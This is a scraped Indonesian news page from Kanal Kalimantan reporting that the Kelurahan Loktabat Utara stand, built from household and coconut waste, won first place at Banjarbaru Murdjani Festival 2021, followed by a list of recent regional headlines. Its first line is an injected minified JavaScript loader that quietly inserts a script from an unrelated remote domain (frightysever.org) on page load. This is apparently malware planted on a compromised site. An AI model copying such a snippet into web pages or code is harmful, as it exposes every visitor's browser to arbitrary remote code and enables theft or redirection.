(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Usung Konsep Rumah Limbah, Stand Kelurahan Loktabat Utara Tampil Beda di Banjarbaru Murdjani Festival 2021


KANALKALIMANTAN.COM, BANJARBARU – Mengangkat tema “Rumah Limbah” stand Kelurahan Loktabat Utara tampil sebagai juara pertama stand katagori kelurahan Banjarbaru Murdjani Festival 2021.

Limbah rumah tangga dan limbah kelapa menjadi keunikan tersendiri bagi stand Kelurahan Loktabat Utara dari stand-stand lainnya.

Ketua PKK Kelurahan Loktabat Utara, Marlinda Fitriani mengungkapkan Kelurahan Loktabat Utara mengambil konsep dari limbah walaupun sudah tidak terpakai lagi limbah kalau dikreasikan dan punya nilai jual tinggi.

“Stand Loktabat Utara mengangkat konsep dari rumah limbah, artinya rumah tangga yang sering dibuang khususnya dari tanaman,” ungkapnya.

 

 

Baca juga: Bus Vaksinasi ‘Kejar Tayang’ Beri Layanan Malam Hari

Di Kelurahan Loktabat Utara sendiri kata Marlinda, salah satu yang memanfaatkan limbah rumah tangga dan tanaman ini seperti komunitas Bonkla Borneo yang memanfaatkan limbah sebagai karya seni dan dikreasikan dengan berbagai karakter.

“Semua yang di stand Kelurahan Loktabat Utara seratus persen memanfaatkan limbah rumah tangga, seperti gapura yang terbuat dari kain bekas,” ujarnya.

 

Diungkapkan Marlinda pembinaan pemanfaatan limbah tidak hanya dari Kelurahan Loktabat Utara juga ada dari beberapa dinas terkait.

“Insyaallah kami akan lebih semangat lagi, kami akan membuktikan bahwa limbah rumah tangga itu berguna untuk masyarakat dan bisa meningkatkan pendapatan keluarga,” tandasnya.

Baca juga: Banjarbaru Murdjani Festival 2021 Berakhir, UMKM Bangkit dan Siap Bersaing di Pasar Bebas

Stand kelurahan lain yang berhasil memperoleh juara kedua adalah Kelurahan Palam dan juara ketiga Kelurahan Sungai Besar.

Kemudian, juara harapan pertama ada Kelurahan Landasan Ulin Barat, juara harapan kedua ada Kelurahan Guntung Manggis dan juara harapan ketiga ada Kelurahan Guntung Paikat. (kanalkalimantan.com/ibnu)

Reporter : ibnu
Editor : bie


Risa

Recent Posts

“Bakawaan Season 1” Perkuat Kolaborasi Ekosistem Ekraf Balangan

KANALKALIMANTAN.COM, PARINGIN - Gerakan Ekonomi Kreatif Nasional (Gekrafs) Kabupaten Balangan menghadirkan Balangan Kreatif Wadah Anak… Read More

11 jam ago

Banjarmasin Masih ‘Darurat Sampah’, Dorong Pengolahan Sampah Organik Mandiri

KANALKALIMANTAN.COM, BANJARMASIN - Wali Kota Banjarmasin, H Muhammad Yamin HR mendorong masyarakat bisa mengolah sampah… Read More

11 jam ago

Stadion Internasional di Landasan Ulin Barat, Lahan 28,7 Hektare Disiapkan

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Provinsi Kalimantan Selatan (Kalsel) mengumumkan penetapan lokasi pembebasan lahan untuk pembangunan… Read More

12 jam ago

‎Satlantas Polres HSU Bersama Ojol Mitra Tertib Berlalu Lintas ‎

‎KANALKALIMANTAN.COM, AMUNTAI - ‎Satuan Lalu Lintas (Satlantas) Polres Hulu Sungai Utara (HSU) menggelar kegiatan bertajuk… Read More

1 hari ago

Jemaah Haul ke-6 Abah Haji Penuhi Jalan Masjid Jami Banjarmasin

KANALKALIMANTAN.COM, BANJARMASIN — Lautan manusia jemaah Haul ke-6 KH Ahmad Zuhdianoor atau dikenal Abah Haji… Read More

1 hari ago

Satgas Saber Pangan HSU Turun ke Pasar Induk Amuntai

KANALKALIMANTAN.COM, AMUNTAI - Menjelang bulan Ramadan, Badan Pangan Nasional (Bapanas) bersama Satgas Saber Pangan Kabupaten… Read More

1 hari ago

This website uses cookies.